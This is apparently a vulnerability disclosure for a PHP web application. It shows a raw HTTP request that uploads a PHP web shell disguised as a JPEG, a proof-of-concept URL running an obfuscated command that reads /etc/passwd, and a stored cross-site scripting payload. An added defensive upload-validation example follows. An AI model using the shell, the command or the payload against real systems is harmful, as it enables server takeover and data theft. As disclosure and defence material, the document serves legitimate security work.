1. Arbitrary File Upload:
-------------------------
Parameter: myfile (POST)
POC URL: http://localhost/uploads/Test.php?cmd=cat%20$%28echo%20L2V0Yy9wYXNzd2Q=%20|%20base64%20-d%29

POST /upload.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/USERS/index.php
Content-Length: 419
Content-Type: multipart/form-data; boundary=---------------------------8914507815764
Cookie: PHPSESSID=7k4au5p4m0skscj4gjbfedfjs5; AuthU=demo%7Efe01ce2a7fbac8fafaed7c982a04e229%7E1462616214
Connection: close

-----------------------------8914507815764
Content-Disposition: form-data; name="myfile"; filename="Test.php"
Content-Type: image/jpeg

<?php
system($_GET['cmd']);
?>
-----------------------------8914507815764
Content-Disposition: form-data; name=""

undefined
-----------------------------8914507815764
Content-Disposition: form-data; name=""

undefined
-----------------------------8914507815764--

2. Persistent Cross Site Scripting:
-----------------------------------
http://localhost/USERS/index.php
Parameters: title, html, headline, size, youtube_id, address, latitude, longitude, user_first_name, user_last_name, agency, user_phone, user_email, website (POST)
Payload: " onmousemove=alert(1)
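
In the upload request of item 1, a file named Test.php was sent with the part header Content-Type: image/jpeg. The following server-side check ignores that header and decides from the file name and the bytes; it is an added example, not code from the affected application or from the original paste, and `safe_upload_name`, `ALLOWED_TYPES` and the sample inputs are hypothetical or constructed.

```php
<?php
// Added example; names are hypothetical, sample inputs are constructed.

// Allowlist: final extension => MIME type the content must really have.
const ALLOWED_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Return a server-generated storage name for an upload, or null to reject.
 * The client-supplied part Content-Type is deliberately not an input.
 */
function safe_upload_name(string $clientName, string $bytes): ?string
{
    // Only the final extension counts, and it must be on the allowlist.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_TYPES)) {
        return null;
    }
    // Detect the type from the bytes themselves (fileinfo extension).
    $detected = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($detected !== ALLOWED_TYPES[$ext]) {
        return null;
    }
    // Never store under the client's name; keep only the vetted extension.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed samples: a harmless script body and a tiny one-pixel GIF.
$script = "<?php echo 'test'; ?>";
$gif    = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
        . "\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02\x44\x01\x00\x3b";

$samples = [
    'Test.php'     => $script, // same name as in the request above
    'Test.php.jpg' => $script, // renamed, but the content is still a script
    'logo.gif'     => $gif,    // extension and content agree
];
foreach ($samples as $name => $bytes) {
    $stored = safe_upload_name($name, $bytes);
    echo $name, ' => ', $stored ?? 'REJECTED', PHP_EOL;
}
```

Storing uploads outside the web root, or disabling script execution for the uploads directory, is still needed alongside this check, because a file with a valid image header can carry embedded PHP.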